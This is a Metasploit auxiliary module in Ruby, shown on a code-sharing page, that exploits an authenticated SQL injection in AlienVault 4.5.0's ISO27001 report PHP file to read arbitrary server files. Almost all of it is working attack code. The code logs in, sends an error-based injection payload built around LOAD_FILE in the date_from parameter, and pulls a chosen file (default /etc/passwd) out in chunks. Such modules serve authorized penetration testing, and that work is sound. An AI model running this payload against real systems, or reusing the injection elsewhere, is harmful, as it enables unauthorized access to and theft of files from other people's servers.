Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/gather/alienvault_iso27001_sqli.rb
21545 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => "AlienVault Authenticated SQL Injection Arbitrary File Read",

14
        'Description' => %q{

15
          AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG

16
          generation PHP file. This module exploits this to read an arbitrary file from

17
          the file system. Any authenticated user is able to exploit it, as administrator

18
          privileges aren't required.

19
        },

20
        'License' => MSF_LICENSE,

21
        'Author' => [

22
          'Brandon Perry <bperry.volatile[at]gmail.com>' # meatpistol module

23
        ],

24
        'References' => [

25
          ['EDB', '32644']

26
        ],

27
        'DefaultOptions' => {

28
          'SSL' => true

29
        },

30
        'Platform' => ['linux'],

31
        'Privileged' => false,

32
        'DisclosureDate' => '2014-03-30',

33
        'Notes' => {

34
          'Reliability' => UNKNOWN_RELIABILITY,

35
          'Stability' => UNKNOWN_STABILITY,

36
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

37
        }

38
      )

39
    )

40


41
    register_options(

42
      [

43
        Opt::RPORT(443),

44
        OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),

45
        OptString.new('USERNAME', [ true, 'Single username' ]),

46
        OptString.new('PASSWORD', [ true, 'Single password' ]),

47
        OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ])

48
      ]

49
    )

50
  end

51


52
  def run

53
    print_status("Get a valid session cookie...")

54
    res = send_request_cgi({

55
      'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')

56
    })

57


58
    unless res and res.code == 200

59
      print_error("Server did not respond in an expected way")

60
      return

61
    end

62


63
    cookie = res.get_cookies

64


65
    if cookie.blank?

66
      print_error("Could not retrieve a cookie")

67
      return

68
    end

69


70
    post = {

71
      'embed' => '',

72
      'bookmark_string' => '',

73
      'user' => datastore['USERNAME'],

74
      'passu' => datastore['PASSWORD'],

75
      'pass' => Rex::Text.encode_base64(datastore['PASSWORD'])

76
    }

77


78
    print_status("Login...")

79


80
    res = send_request_cgi({

81
      'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'),

82
      'method' => 'POST',

83
      'vars_post' => post,

84
      'cookie' => cookie

85
    })

86


87
    unless res and res.code == 302

88
      print_error("Server did not respond in an expected way")

89
      return

90
    end

91


92
    unless res.headers['Location'] && res.headers['Location'] == normalize_uri(target_uri.path, 'ossim/')

93
      print_error("Authentication failed")

94
      return

95
    end

96


97
    cookie = res.get_cookies

98


99
    if cookie.blank?

100
      print_error("Could not retrieve the authenticated cookie")

101
      return

102
    end

103


104
    i = 0

105
    full = ''

106
    filename = datastore['FILEPATH'].unpack("H*")[0]

107
    left_marker = Rex::Text.rand_text_alpha(6)

108
    right_marker = Rex::Text.rand_text_alpha(6)

109


110
    print_status("Exploiting SQLi...")

111


112
    loop do

113
      file = sqli(left_marker, right_marker, i, cookie, filename)

114
      return if file.nil?

115
      break if file.empty?

116


117
      str = [file].pack("H*")

118
      full << str

119
      vprint_status(str)

120


121
      i = i + 1

122
    end

123


124
    path = store_loot('alienvault.file', 'text/plain', datastore['RHOST'], full, datastore['FILEPATH'])

125
    print_good("File stored at path: " + path)

126
  end

127


128
  def sqli(left_marker, right_marker, i, cookie, filename)

129
    pay = "2014-02-28' AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"

130
    pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#{filename})) AS CHAR),"

131
    pay << "0x20)),#{(50 * i) + 1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"

132
    pay << " GROUP BY x)a) AND 'xnDa'='xnDa"

133


134
    get = {

135
      'date_from' => pay,

136
      'date_to' => '2014-03-30'

137
    }

138


139
    res = send_request_cgi({

140
      'uri' => normalize_uri(target_uri.path, 'ossim', 'report', 'BusinessAndComplianceISOPCI', 'ISO27001Bar1.php'),

141
      'cookie' => cookie,

142
      'vars_get' => get

143
    })

144


145
    if res and res.body and res.body =~ /#{left_marker}(.*)#{right_marker}/

146
      return $1

147
    else

148
      print_error("Server did not respond in an expected way")

149
      return nil

150
    end

151
  end

152
end

153


154